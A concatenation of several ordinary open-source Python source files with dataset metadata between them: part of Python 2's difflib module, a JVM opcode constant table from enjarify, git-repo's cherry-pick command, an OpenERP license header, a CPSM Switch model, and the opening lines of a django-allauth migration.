def ndiff(a, b, linejunk=None, charjunk=IS_CHARACTER_JUNK):
r"""
Compare `a` and `b` (lists of strings); return a `Differ`-style delta.
Optional keyword parameters `linejunk` and `charjunk` are for filter
functions (or None):
- linejunk: A function that should accept a single string argument, and
return true iff the string is junk. The default is None, and is
recommended; as of Python 2.3, an adaptive notion of "noise" lines is
used that does a good job on its own.
- charjunk: A function that should accept a string of length 1. The
default is module-level function IS_CHARACTER_JUNK, which filters out
whitespace characters (a blank or tab; note: bad idea to include newline
in this!).
Tools/scripts/ndiff.py is a command-line front-end to this function.
Example:
>>> diff = ndiff('one\ntwo\nthree\n'.splitlines(1),
... 'ore\ntree\nemu\n'.splitlines(1))
>>> print ''.join(diff),
- one
? ^
+ ore
? ^
- two
- three
? -
+ tree
+ emu
"""
return Differ(linejunk, charjunk).compare(a, b)
def _mdiff(fromlines, tolines, context=None, linejunk=None,
charjunk=IS_CHARACTER_JUNK):
r"""Returns generator yielding marked up from/to side by side differences.
Arguments:
fromlines -- list of text lines to compared to tolines
tolines -- list of text lines to be compared to fromlines
context -- number of context lines to display on each side of difference,
if None, all from/to text lines will be generated.
linejunk -- passed on to ndiff (see ndiff documentation)
charjunk -- passed on to ndiff (see ndiff documentation)
This function returns an iterator which returns a tuple:
(from line tuple, to line tuple, boolean flag)
from/to line tuple -- (line num, line text)
line num -- integer or None (to indicate a context separation)
line text -- original line text with following markers inserted:
'\0+' -- marks start of added text
'\0-' -- marks start of deleted text
'\0^' -- marks start of changed text
'\1' -- marks end of added/deleted/changed text
boolean flag -- None indicates context separation, True indicates
either "from" or "to" line contains a change, otherwise False.
This function/iterator was originally developed to generate side by side
file difference for making HTML pages (see HtmlDiff class for example
usage).
Note, this function utilizes the ndiff function to generate the side by
side difference markup. Optional ndiff arguments may be passed to this
function and they in turn will be passed to ndiff.
"""
import re
# regular expression for finding intraline change indices
change_re = re.compile('(\++|\-+|\^+)')
# create the difference iterator to generate the differences
diff_lines_iterator = ndiff(fromlines,tolines,linejunk,charjunk)
def _make_line(lines, format_key, side, num_lines=[0,0]):
"""Returns line of text with user's change markup and line formatting.
lines -- list of lines from the ndiff generator to produce a line of
text from. When producing the line of text to return, the
lines used are removed from this list.
format_key -- '+' return first line in list with "add" markup around
the entire line.
'-' return first line in list with "delete" markup around
the entire line.
'?' return first line in list with add/delete/change
intraline markup (indices obtained from second line)
None return first line in list with no markup
side -- indice into the num_lines list (0=from,1=to)
num_lines -- from/to current line number. This is NOT intended to be a
passed parameter. It is present as a keyword argument to
maintain memory of the current line numbers between calls
of this function.
Note, this function is purposefully not defined at the module scope so
that data it needs from its parent function (within whose context it
is defined) does not need to be of module scope.
"""
num_lines[side] += 1
# Handle case where no user markup is to be added, just return line of
# text with user's line format to allow for usage of the line number.
if format_key is None:
return (num_lines[side],lines.pop(0)[2:])
# Handle case of intraline changes
if format_key == '?':
text, markers = lines.pop(0), lines.pop(0)
# find intraline changes (store change type and indices in tuples)
sub_info = []
def record_sub_info(match_object,sub_info=sub_info):
sub_info.append([match_object.group(1)[0],match_object.span()])
return match_object.group(1)
change_re.sub(record_sub_info,markers)
# process each tuple inserting our special marks that won't be
# noticed by an xml/html escaper.
for key,(begin,end) in sub_info[::-1]:
text = text[0:begin]+'\0'+key+text[begin:end]+'\1'+text[end:]
text = text[2:]
# Handle case of add/delete entire line
else:
text = lines.pop(0)[2:]
# if line of text is just a newline, insert a space so there is
# something for the user to highlight and see.
if not text:
text = ' '
# insert marks that won't be noticed by an xml/html escaper.
text = '\0' + format_key + text + '\1'
# Return line of text, first allow user's line formatter to do its
# thing (such as adding the line number) then replace the special
# marks with what the user's change markup.
return (num_lines[side],text)
def _line_iterator():
"""Yields from/to lines of text with a change indication.
This function is an iterator. It itself pulls lines from a
differencing iterator, processes them and yields them. When it can
it yields both a "from" and a "to" line, otherwise it will yield one
or the other. In addition to yielding the lines of from/to text, a
boolean flag is yielded to indicate if the text line(s) have
differences in them.
Note, this function is purposefully not defined at the module scope so
that data it needs from its parent function (within whose context it
is defined) does not need to be of module scope.
"""
lines = []
num_blanks_pending, num_blanks_to_yield = 0, 0
while True:
# Load up next 4 lines so we can look ahead, create strings which
# are a concatenation of the first character of each of the 4 lines
# so we can do some very readable comparisons.
while len(lines) < 4:
try:
lines.append(diff_lines_iterator.next())
except StopIteration:
lines.append('X')
s = ''.join([line[0] for line in lines])
if s.startswith('X'):
# When no more lines, pump out any remaining blank lines so the
# corresponding add/delete lines get a matching blank line so
# all line pairs get yielded at the next level.
num_blanks_to_yield = num_blanks_pending
elif s.startswith('-?+?'):
# simple intraline change
yield _make_line(lines,'?',0), _make_line(lines,'?',1), True
continue
elif s.startswith('--++'):
# in delete block, add block coming: we do NOT want to get
# caught up on blank lines yet, just process the delete line
num_blanks_pending -= 1
yield _make_line(lines,'-',0), None, True
continue
elif s.startswith(('--?+', '--+', '- ')):
# in delete block and see an intraline change or unchanged line
# coming: yield the delete line and then blanks
from_line,to_line = _make_line(lines,'-',0), None
num_blanks_to_yield,num_blanks_pending = num_blanks_pending-1,0
elif s.startswith('-+?'):
# intraline change
yield _make_line(lines,None,0), _make_line(lines,'?',1), True
continue
elif s.startswith('-?+'):
# intraline change
yield _make_line(lines,'?',0), _make_line(lines,None,1), True
continue
elif s.startswith('-'):
# delete FROM line
num_blanks_pending -= 1
yield _make_line(lines,'-',0), None, True
continue
elif s.startswith('+--'):
# in add block, delete block coming: we do NOT want to get
# caught up on blank lines yet, just process the add line
num_blanks_pending += 1
yield None, _make_line(lines,'+',1), True
continue
elif s.startswith(('+ ', '+-')):
# will be leaving an add block: yield blanks then add line
from_line, to_line = None, _make_line(lines,'+',1)
num_blanks_to_yield,num_blanks_pending = num_blanks_pending+1,0
elif s.startswith('+'):
# inside an add block, yield the add line
num_blanks_pending += 1
yield None, _make_line(lines,'+',1), True
continue
elif s.startswith(' '):
# unchanged text, yield it to both sides
yield _make_line(lines[:],None,0),_make_line(lines,None,1),False
continue
# Catch up on the blank lines so when we yield the next from/to
# pair, they are lined up.
while(num_blanks_to_yield < 0):
num_blanks_to_yield += 1
yield None,('','\n'),True
while(num_blanks_to_yield > 0):
num_blanks_to_yield -= 1
yield ('','\n'),None,True
if s.startswith('X'):
raise StopIteration
else:
yield from_line,to_line,True
def _line_pair_iterator():
"""Yields from/to lines of text with a change indication.
This function is an iterator. It itself pulls lines from the line
iterator. Its difference from that iterator is that this function
always yields a pair of from/to text lines (with the change
indication). If necessary it will collect single from/to lines
until it has a matching pair from/to pair to yield.
Note, this function is purposefully not defined at the module scope so
that data it needs from its parent function (within whose context it
is defined) does not need to be of module scope.
"""
line_iterator = _line_iterator()
fromlines,tolines=[],[]
while True:
# Collecting lines of text until we have a from/to pair
while (len(fromlines)==0 or len(tolines)==0):
from_line, to_line, found_diff =line_iterator.next()
if from_line is not None:
fromlines.append((from_line,found_diff))
if to_line is not None:
tolines.append((to_line,found_diff))
# Once we have a pair, remove them from the collection and yield it
from_line, fromDiff = fromlines.pop(0)
to_line, to_diff = tolines.pop(0)
yield (from_line,to_line,fromDiff or to_diff)
# Handle case where user does not want context differencing, just yield
# them up without doing anything else with them.
line_pair_iterator = _line_pair_iterator()
if context is None:
while True:
yield line_pair_iterator.next()
# Handle case where user wants context differencing. We must do some
# storage of lines until we know for sure that they are to be yielded.
else:
context += 1
lines_to_write = 0
while True:
# Store lines up until we find a difference, note use of a
# circular queue because we only need to keep around what
# we need for context.
index, contextLines = 0, [None]*(context)
found_diff = False
while(found_diff is False):
from_line, to_line, found_diff = line_pair_iterator.next()
i = index % context
contextLines[i] = (from_line, to_line, found_diff)
index += 1
# Yield lines that we have collected so far, but first yield
# the user's separator.
if index > context:
yield None, None, None
lines_to_write = context
else:
lines_to_write = index
index = 0
while(lines_to_write):
i = index % context
index += 1
yield contextLines[i]
lines_to_write -= 1
# Now yield the context lines after the change
lines_to_write = context-1
while(lines_to_write):
from_line, to_line, found_diff = line_pair_iterator.next()
# If another change within the context, extend the context
if found_diff:
lines_to_write = context-1
else:
lines_to_write -= 1
yield from_line, to_line, found_diff
_file_template = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1" />
<title></title>
<style type="text/css">%(styles)s
</style>
</head>
<body>
%(table)s%(legend)s
</body>
</html>"""
_styles = """
table.diff {font-family:Courier; border:medium;}
.diff_header {background-color:#e0e0e0}
td.diff_header {text-align:right}
.diff_next {background-color:#c0c0c0}
.diff_add {background-color:#aaffaa}
.diff_chg {background-color:#ffff77}
.diff_sub {background-color:#ffaaaa}"""
_table_template = """
<table class="diff" id="difflib_chg_%(prefix)s_top"
cellspacing="0" cellpadding="0" rules="groups" >
<colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
<colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
%(header_row)s
<tbody>
%(data_rows)s </tbody>
</table>"""
_legend = """
<table class="diff" summary="Legends">
<tr> <th colspan="2"> Legends </th> </tr>
<tr> <td> <table border="" summary="Colors">
<tr><th> Colors </th> </tr>
<tr><td class="diff_add"> Added </td></tr>
<tr><td class="diff_chg">Changed</td> </tr>
<tr><td class="diff_sub">Deleted</td> </tr>
</table></td>
<td> <table border="" summary="Links">
<tr><th colspan="2"> Links </th> </tr>
<tr><td>(f)irst change</td> </tr>
<tr><td>(n)ext change</td> </tr>
<tr><td>(t)op</td> </tr>
</table></td> </tr>
</table>"""
class HtmlDiff(object):
"""For producing HTML side by side comparison with change highlights.
This class can be used to create an HTML table (or a complete HTML file
containing the table) showing a side by side, line by line comparison
of text with inter-line and intra-line change highlights. The table can
be generated in either full or contextual difference mode.
The following methods are provided for HTML generation:
make_table -- generates HTML for a single side by side table
make_file -- generates complete HTML file with a single side by side table
See tools/scripts/diff.py for an example usage of this class.
"""
_file_template = _file_template
_styles = _styles
_table_template = _table_template
_legend = _legend
_default_prefix = 0
def __init__(self,tabsize=8,wrapcolumn=None,linejunk=None,
charjunk=IS_CHARACTER_JUNK):
"""HtmlDiff instance initializer
Arguments:
tabsize -- tab stop spacing, defaults to 8.
wrapcolumn -- column number where lines are broken and wrapped,
defaults to None where lines are not wrapped.
linejunk,charjunk -- keyword arguments passed into ndiff() (used to by
HtmlDiff() to generate the side by side HTML differences). See
ndiff() documentation for argument default values and descriptions.
"""
self._tabsize = tabsize
self._wrapcolumn = wrapcolumn
self._linejunk = linejunk
self._charjunk = charjunk
def make_file(self,fromlines,tolines,fromdesc='',todesc='',context=False,
numlines=5):
"""Returns HTML file of side by side comparison with change highlights
Arguments:
fromlines -- list of "from" lines
tolines -- list of "to" lines
fromdesc -- "from" file column header string
todesc -- "to" file column header string
context -- set to True for contextual differences (defaults to False
which shows full differences).
numlines -- number of context lines. When context is set True,
controls number of lines displayed before and after the change.
When context is False, controls the number of lines to place
the "next" link anchors before the next change (so click of
"next" link jumps to just before the change).
"""
return self._file_template % dict(
styles = self._styles,
legend = self._legend,
table = self.make_table(fromlines,tolines,fromdesc,todesc,
context=context,numlines=numlines))
def _tab_newline_replace(self,fromlines,tolines):
"""Returns from/to line lists with tabs expanded and newlines removed.
Instead of tab characters being replaced by the number of spaces
needed to fill in to the next tab stop, this function will fill
the space with tab characters. This is done so that the difference
algorithms can identify changes in a file when tabs are replaced by
spaces and vice versa. At the end of the HTML generation, the tab
characters will be replaced with a nonbreakable space.
"""
def expand_tabs(line):
# hide real spaces
line = line.replace(' ','\0')
# expand tabs into spaces
line = line.expandtabs(self._tabsize)
# replace spaces from expanded tabs back into tab characters
# (we'll replace them with markup after we do differencing)
line = line.replace(' ','\t')
return line.replace('\0',' ').rstrip('\n')
fromlines = [expand_tabs(line) for line in fromlines]
tolines = [expand_tabs(line) for line in tolines]
return fromlines,tolines
def _split_line(self,data_list,line_num,text):
"""Builds list of text lines by splitting text lines at wrap point
This function will determine if the input text line needs to be
wrapped (split) into separate lines. If so, the first wrap point
will be determined and the first line appended to the output
text line list. This function is used recursively to handle
the second part of the split line to further split it.
"""
# if blank line or context separator, just add it to the output list
if not line_num:
data_list.append((line_num,text))
return
# if line text doesn't need wrapping, just add it to the output list
size = len(text)
max = self._wrapcolumn
if (size <= max) or ((size -(text.count('\0')*3)) <= max):
data_list.append((line_num,text))
return
# scan text looking for the wrap point, keeping track if the wrap
# point is inside markers
i = 0
n = 0
mark = ''
while n < max and i < size:
if text[i] == '\0':
i += 1
mark = text[i]
i += 1
elif text[i] == '\1':
i += 1
mark = ''
else:
i += 1
n += 1
# wrap point is inside text, break it up into separate lines
line1 = text[:i]
line2 = text[i:]
# if wrap point is inside markers, place end marker at end of first
# line and start marker at beginning of second line because each
# line will have its own table tag markup around it.
if mark:
line1 = line1 + '\1'
line2 = '\0' + mark + line2
# tack on first line onto the output list
data_list.append((line_num,line1))
# use this routine again to wrap the remaining text
self._split_line(data_list,'>',line2)
def _line_wrapper(self,diffs):
"""Returns iterator that splits (wraps) mdiff text lines"""
# pull from/to data and flags from mdiff iterator
for fromdata,todata,flag in diffs:
# check for context separators and pass them through
if flag is None:
yield fromdata,todata,flag
continue
(fromline,fromtext),(toline,totext) = fromdata,todata
# for each from/to line split it at the wrap column to form
# list of text lines.
fromlist,tolist = [],[]
self._split_line(fromlist,fromline,fromtext)
self._split_line(tolist,toline,totext)
# yield from/to line in pairs inserting blank lines as
# necessary when one side has more wrapped lines
while fromlist or tolist:
if fromlist:
fromdata = fromlist.pop(0)
else:
fromdata = ('',' ')
if tolist:
todata = tolist.pop(0)
else:
todata = ('',' ')
yield fromdata,todata,flag
def _collect_lines(self,diffs):
"""Collects mdiff output into separate lists
Before storing the mdiff from/to data into a list, it is converted
into a single line of text with HTML markup.
"""
fromlist,tolist,flaglist = [],[],[]
# pull from/to data and flags from mdiff style iterator
for fromdata,todata,flag in diffs:
try:
# store HTML markup of the lines into the lists
fromlist.append(self._format_line(0,flag,*fromdata))
tolist.append(self._format_line(1,flag,*todata))
except TypeError:
# exceptions occur for lines where context separators go
fromlist.append(None)
tolist.append(None)
flaglist.append(flag)
return fromlist,tolist,flaglist
def _format_line(self,side,flag,linenum,text):
"""Returns HTML markup of "from" / "to" text lines
side -- 0 or 1 indicating "from" or "to" text
flag -- indicates if difference on line
linenum -- line number (used for line number column)
text -- line text to be marked up
"""
try:
linenum = '%d' % linenum
id = ' id="%s%s"' % (self._prefix[side],linenum)
except TypeError:
# handle blank lines where linenum is '>' or ''
id = ''
# replace those things that would get confused with HTML symbols
text=text.replace("&","&").replace(">",">").replace("<","<")
# make space non-breakable so they don't get compressed or line wrapped
text = text.replace(' ',' ').rstrip()
return '<td class="diff_header"%s>%s</td><td nowrap="nowrap">%s</td>' \
% (id,linenum,text)
def _make_prefix(self):
"""Create unique anchor prefixes"""
# Generate a unique anchor prefix so multiple tables
# can exist on the same HTML page without conflicts.
fromprefix = "from%d_" % HtmlDiff._default_prefix
toprefix = "to%d_" % HtmlDiff._default_prefix
HtmlDiff._default_prefix += 1
# store prefixes so line format method has access
self._prefix = [fromprefix,toprefix]
def _convert_flags(self,fromlist,tolist,flaglist,context,numlines):
"""Makes list of "next" links"""
# all anchor names will be generated using the unique "to" prefix
toprefix = self._prefix[1]
# process change flags, generating middle column of next anchors/links
next_id = ['']*len(flaglist)
next_href = ['']*len(flaglist)
num_chg, in_change = 0, False
last = 0
for i,flag in enumerate(flaglist):
if flag:
if not in_change:
in_change = True
last = i
# at the beginning of a change, drop an anchor a few lines
# (the context lines) before the change for the previous
# link
i = max([0,i-numlines])
next_id[i] = ' id="difflib_chg_%s_%d"' % (toprefix,num_chg)
# at the beginning of a change, drop a link to the next
# change
num_chg += 1
next_href[last] = '<a href="#difflib_chg_%s_%d">n</a>' % (
toprefix,num_chg)
else:
in_change = False
# check for cases where there is no content to avoid exceptions
if not flaglist:
flaglist = [False]
next_id = ['']
next_href = ['']
last = 0
if context:
fromlist = ['<td></td><td> No Differences Found </td>']
tolist = fromlist
else:
fromlist = tolist = ['<td></td><td> Empty File </td>']
# if not a change on first line, drop a link
if not flaglist[0]:
next_href[0] = '<a href="#difflib_chg_%s_0">f</a>' % toprefix
# redo the last link to link to the top
next_href[last] = '<a href="#difflib_chg_%s_top">t</a>' % (toprefix)
return fromlist,tolist,flaglist,next_href,next_id
def make_table(self,fromlines,tolines,fromdesc='',todesc='',context=False,
numlines=5):
"""Returns HTML table of side by side comparison with change highlights
Arguments:
fromlines -- list of "from" lines
tolines -- list of "to" lines
fromdesc -- "from" file column header string
todesc -- "to" file column header string
context -- set to True for contextual differences (defaults to False
which shows full differences).
numlines -- number of context lines. When context is set True,
controls number of lines displayed before and after the change.
When context is False, controls the number of lines to place
the "next" link anchors before the next change (so click of
"next" link jumps to just before the change).
"""
# make unique anchor prefixes so that multiple tables may exist
# on the same page without conflict.
self._make_prefix()
# change tabs to spaces before it gets more difficult after we insert
# markup
fromlines,tolines = self._tab_newline_replace(fromlines,tolines)
# create diffs iterator which generates side by side from/to data
if context:
context_lines = numlines
else:
context_lines = None
diffs = _mdiff(fromlines,tolines,context_lines,linejunk=self._linejunk,
charjunk=self._charjunk)
# set up iterator to wrap lines that exceed desired width
if self._wrapcolumn:
diffs = self._line_wrapper(diffs)
# collect up from/to lines and flags into lists (also format the lines)
fromlist,tolist,flaglist = self._collect_lines(diffs)
# process change flags, generating middle column of next anchors/links
fromlist,tolist,flaglist,next_href,next_id = self._convert_flags(
fromlist,tolist,flaglist,context,numlines)
s = []
fmt = ' <tr><td class="diff_next"%s>%s</td>%s' + \
'<td class="diff_next">%s</td>%s</tr>\n'
for i in range(len(flaglist)):
if flaglist[i] is None:
# mdiff yields None on separator lines skip the bogus ones
# generated for the first line
if i > 0:
s.append(' </tbody> \n <tbody>\n')
else:
s.append( fmt % (next_id[i],next_href[i],fromlist[i],
next_href[i],tolist[i]))
if fromdesc or todesc:
header_row = '<thead><tr>%s%s%s%s</tr></thead>' % (
'<th class="diff_next"><br /></th>',
'<th colspan="2" class="diff_header">%s</th>' % fromdesc,
'<th class="diff_next"><br /></th>',
'<th colspan="2" class="diff_header">%s</th>' % todesc)
else:
header_row = ''
table = self._table_template % dict(
data_rows=''.join(s),
header_row=header_row,
prefix=self._prefix[1])
return table.replace('\0+','<span class="diff_add">'). \
replace('\0-','<span class="diff_sub">'). \
replace('\0^','<span class="diff_chg">'). \
replace('\1','</span>'). \
replace('\t',' ')
del re
def restore(delta, which):
r"""
Generate one of the two sequences that generated a delta.
Given a `delta` produced by `Differ.compare()` or `ndiff()`, extract
lines originating from file 1 or 2 (parameter `which`), stripping off line
prefixes.
Examples:
>>> diff = ndiff('one\ntwo\nthree\n'.splitlines(1),
... 'ore\ntree\nemu\n'.splitlines(1))
>>> diff = list(diff)
>>> print ''.join(restore(diff, 1)),
one
two
three
>>> print ''.join(restore(diff, 2)),
ore
tree
emu
"""
try:
tag = {1: "- ", 2: "+ "}[int(which)]
except KeyError:
raise ValueError, ('unknown delta choice (must be 1 or 2): %r'
% which)
prefixes = (" ", tag)
for line in delta:
if line[:2] in prefixes:
yield line[2:]
def _test():
import doctest, difflib
return doctest.testmod(difflib)
if __name__ == "__main__":
_test()
| mit |
EasonYi/enjarify | enjarify/jvm/jvmops.py | 35 | 3479 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
NOP = 0x00
ACONST_NULL = 0x01
ICONST_M1 = 0x02
ICONST_0 = 0x03
ICONST_1 = 0x04
ICONST_2 = 0x05
ICONST_3 = 0x06
ICONST_4 = 0x07
ICONST_5 = 0x08
LCONST_0 = 0x09
LCONST_1 = 0x0A
FCONST_0 = 0x0B
FCONST_1 = 0x0C
FCONST_2 = 0x0D
DCONST_0 = 0x0E
DCONST_1 = 0x0F
BIPUSH = 0x10
SIPUSH = 0x11
LDC = 0x12
LDC_W = 0x13
LDC2_W = 0x14
ILOAD = 0x15
LLOAD = 0x16
FLOAD = 0x17
DLOAD = 0x18
ALOAD = 0x19
ILOAD_0 = 0x1A
ILOAD_1 = 0x1B
ILOAD_2 = 0x1C
ILOAD_3 = 0x1D
LLOAD_0 = 0x1E
LLOAD_1 = 0x1F
LLOAD_2 = 0x20
LLOAD_3 = 0x21
FLOAD_0 = 0x22
FLOAD_1 = 0x23
FLOAD_2 = 0x24
FLOAD_3 = 0x25
DLOAD_0 = 0x26
DLOAD_1 = 0x27
DLOAD_2 = 0x28
DLOAD_3 = 0x29
ALOAD_0 = 0x2A
ALOAD_1 = 0x2B
ALOAD_2 = 0x2C
ALOAD_3 = 0x2D
IALOAD = 0x2E
LALOAD = 0x2F
FALOAD = 0x30
DALOAD = 0x31
AALOAD = 0x32
BALOAD = 0x33
CALOAD = 0x34
SALOAD = 0x35
ISTORE = 0x36
LSTORE = 0x37
FSTORE = 0x38
DSTORE = 0x39
ASTORE = 0x3A
ISTORE_0 = 0x3B
ISTORE_1 = 0x3C
ISTORE_2 = 0x3D
ISTORE_3 = 0x3E
LSTORE_0 = 0x3F
LSTORE_1 = 0x40
LSTORE_2 = 0x41
LSTORE_3 = 0x42
FSTORE_0 = 0x43
FSTORE_1 = 0x44
FSTORE_2 = 0x45
FSTORE_3 = 0x46
DSTORE_0 = 0x47
DSTORE_1 = 0x48
DSTORE_2 = 0x49
DSTORE_3 = 0x4A
ASTORE_0 = 0x4B
ASTORE_1 = 0x4C
ASTORE_2 = 0x4D
ASTORE_3 = 0x4E
IASTORE = 0x4F
LASTORE = 0x50
FASTORE = 0x51
DASTORE = 0x52
AASTORE = 0x53
BASTORE = 0x54
CASTORE = 0x55
SASTORE = 0x56
POP = 0x57
POP2 = 0x58
DUP = 0x59
DUP_X1 = 0x5A
DUP_X2 = 0x5B
DUP2 = 0x5C
DUP2_X1 = 0x5D
DUP2_X2 = 0x5E
SWAP = 0x5F
IADD = 0x60
LADD = 0x61
FADD = 0x62
DADD = 0x63
ISUB = 0x64
LSUB = 0x65
FSUB = 0x66
DSUB = 0x67
IMUL = 0x68
LMUL = 0x69
FMUL = 0x6A
DMUL = 0x6B
IDIV = 0x6C
LDIV = 0x6D
FDIV = 0x6E
DDIV = 0x6F
IREM = 0x70
LREM = 0x71
FREM = 0x72
DREM = 0x73
INEG = 0x74
LNEG = 0x75
FNEG = 0x76
DNEG = 0x77
ISHL = 0x78
LSHL = 0x79
ISHR = 0x7A
LSHR = 0x7B
IUSHR = 0x7C
LUSHR = 0x7D
IAND = 0x7E
LAND = 0x7F
IOR = 0x80
LOR = 0x81
IXOR = 0x82
LXOR = 0x83
IINC = 0x84
I2L = 0x85
I2F = 0x86
I2D = 0x87
L2I = 0x88
L2F = 0x89
L2D = 0x8A
F2I = 0x8B
F2L = 0x8C
F2D = 0x8D
D2I = 0x8E
D2L = 0x8F
D2F = 0x90
I2B = 0x91
I2C = 0x92
I2S = 0x93
LCMP = 0x94
FCMPL = 0x95
FCMPG = 0x96
DCMPL = 0x97
DCMPG = 0x98
IFEQ = 0x99
IFNE = 0x9A
IFLT = 0x9B
IFGE = 0x9C
IFGT = 0x9D
IFLE = 0x9E
IF_ICMPEQ = 0x9F
IF_ICMPNE = 0xA0
IF_ICMPLT = 0xA1
IF_ICMPGE = 0xA2
IF_ICMPGT = 0xA3
IF_ICMPLE = 0xA4
IF_ACMPEQ = 0xA5
IF_ACMPNE = 0xA6
GOTO = 0xA7
JSR = 0xA8
RET = 0xA9
TABLESWITCH = 0xAA
LOOKUPSWITCH = 0xAB
IRETURN = 0xAC
LRETURN = 0xAD
FRETURN = 0xAE
DRETURN = 0xAF
ARETURN = 0xB0
RETURN = 0xB1
GETSTATIC = 0xB2
PUTSTATIC = 0xB3
GETFIELD = 0xB4
PUTFIELD = 0xB5
INVOKEVIRTUAL = 0xB6
INVOKESPECIAL = 0xB7
INVOKESTATIC = 0xB8
INVOKEINTERFACE = 0xB9
INVOKEDYNAMIC = 0xBA
NEW = 0xBB
NEWARRAY = 0xBC
ANEWARRAY = 0xBD
ARRAYLENGTH = 0xBE
ATHROW = 0xBF
CHECKCAST = 0xC0
INSTANCEOF = 0xC1
MONITORENTER = 0xC2
MONITOREXIT = 0xC3
WIDE = 0xC4
MULTIANEWARRAY = 0xC5
IFNULL = 0xC6
IFNONNULL = 0xC7
GOTO_W = 0xC8
JSR_W = 0xC9
| apache-2.0 |
nishad-jobsglobal/odoo-marriot | addons/l10n_it/__init__.py | 447 | 1161 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010
# OpenERP Italian Community (<http://www.openerp-italia.org>)
# Servabit srl
# Agile Business Group sagl
# Domsense srl
# Albatos srl
#
# Copyright (C) 2011
# Associazione OpenERP Italia (<http://www.openerp-italia.org>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
| agpl-3.0 |
fantasyfly/git-repo | subcmds/cherry_pick.py | 48 | 3349 | #
# Copyright (C) 2010 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import sys
from command import Command
from git_command import GitCommand
CHANGE_ID_RE = re.compile(r'^\s*Change-Id: I([0-9a-f]{40})\s*$')
class CherryPick(Command):
common = True
helpSummary = "Cherry-pick a change."
helpUsage = """
%prog <sha1>
"""
helpDescription = """
'%prog' cherry-picks a change from one branch to another.
The change id will be updated, and a reference to the old
change id will be added.
"""
def _Options(self, p):
pass
def Execute(self, opt, args):
if len(args) != 1:
self.Usage()
reference = args[0]
p = GitCommand(None,
['rev-parse', '--verify', reference],
capture_stdout = True,
capture_stderr = True)
if p.Wait() != 0:
print >>sys.stderr, p.stderr
sys.exit(1)
sha1 = p.stdout.strip()
p = GitCommand(None, ['cat-file', 'commit', sha1], capture_stdout=True)
if p.Wait() != 0:
print >>sys.stderr, "error: Failed to retrieve old commit message"
sys.exit(1)
old_msg = self._StripHeader(p.stdout)
p = GitCommand(None,
['cherry-pick', sha1],
capture_stdout = True,
capture_stderr = True)
status = p.Wait()
print >>sys.stdout, p.stdout
print >>sys.stderr, p.stderr
if status == 0:
# The cherry-pick was applied correctly. We just need to edit the
# commit message.
new_msg = self._Reformat(old_msg, sha1)
p = GitCommand(None, ['commit', '--amend', '-F', '-'],
provide_stdin = True,
capture_stdout = True,
capture_stderr = True)
p.stdin.write(new_msg)
if p.Wait() != 0:
print >>sys.stderr, "error: Failed to update commit message"
sys.exit(1)
else:
print >>sys.stderr, """\
NOTE: When committing (please see above) and editing the commit message,
please remove the old Change-Id-line and add:
"""
print >>sys.stderr, self._GetReference(sha1)
print >>sys.stderr
def _IsChangeId(self, line):
return CHANGE_ID_RE.match(line)
def _GetReference(self, sha1):
return "(cherry picked from commit %s)" % sha1
def _StripHeader(self, commit_msg):
lines = commit_msg.splitlines()
return "\n".join(lines[lines.index("")+1:])
def _Reformat(self, old_msg, sha1):
new_msg = []
for line in old_msg.splitlines():
if not self._IsChangeId(line):
new_msg.append(line)
# Add a blank line between the message and the change id/reference
try:
if new_msg[-1].strip() != "":
new_msg.append("")
except IndexError:
pass
new_msg.append(self._GetReference(sha1))
return "\n".join(new_msg)
| apache-2.0 |
rwl/openpowersystem | cpsm/wires/switch.py | 1 | 1788 | #------------------------------------------------------------------------------
# Copyright (C) 2009 Richard Lincoln
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation; version 2 dated June, 1991.
#
# This software is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANDABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#------------------------------------------------------------------------------
""" A generic device designed to close, or open, or both, one or more electric circuits.
"""
# <<< imports
# @generated
from cpsm.core.conducting_equipment import ConductingEquipment
from google.appengine.ext import db
# >>> imports
class Switch(ConductingEquipment):
""" A generic device designed to close, or open, or both, one or more electric circuits.
"""
# <<< switch.attributes
# @generated
# The attribute is used in cases when no Measurement for the status value is present. If the Switch has a status measurment the Discrete.normalValue is expected to match with the Switch.normalOpen.
normal_open = db.BooleanProperty()
# >>> switch.attributes
# <<< switch.references
# @generated
# >>> switch.references
# <<< switch.operations
# @generated
# >>> switch.operations
# EOF -------------------------------------------------------------------------
| agpl-3.0 |
GinnyN/towerofdimensions-django | django-allauth/build/lib/allauth/socialaccount/providers/openid/migrations/0002_tosocialaccount.py | 82 | 7741 | # encoding: utf-8
from south.v2 import DataMigration
class Migration(DataMigration):
